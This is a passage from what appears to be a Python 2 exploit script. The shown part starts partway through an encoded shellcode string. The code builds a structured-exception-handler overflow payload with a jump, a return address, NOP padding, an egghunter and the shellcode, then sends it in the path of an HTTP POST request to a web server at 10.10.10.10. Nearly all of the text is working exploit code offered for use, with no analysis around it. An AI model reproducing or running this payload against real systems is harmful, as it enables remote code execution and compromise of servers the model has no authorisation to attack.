"\x69\x32\x30\x56\x33\x58\x4c\x66\x4e\x75\x4d\x6d\x4d\x4d\x59"
"\x6f\x38\x55\x37\x4c\x57\x76\x33\x4c\x54\x4a\x6d\x50\x6b\x4b"
"\x4b\x50\x32\x55\x53\x35\x4d\x6b\x63\x77\x57\x63\x73\x42\x32"
"\x4f\x52\x4a\x37\x70\x51\x43\x4b\x4f\x58\x55\x41\x41")
buf_totlen = 5000
dist_seh = 2492
nseh = "\xeb\x06AA"
seh = 0x1011369e
nops = "\x90" * 10
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
egg = "w00tw00t"
payload = ""
payload += "A"*(dist_seh - len(payload))
payload += nseh
payload += struct.pack("<I", seh)
payload += nops
payload += egghunter
payload += egg
payload += shellcode
payload += "D"*(buf_totlen - len(payload))
buf = "POST /../%s HTTP/1.1\r\n" %payload
buf += "Host: 10.10.10.10\r\n"
buf += "User-Agent: Mozilla/5.0\r\n"
buf += "Connection: close\r\n"
buf += "\r\n"
print "Sending the payload!"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("10.10.10.10", 80))
expl.send(buf)
expl.close()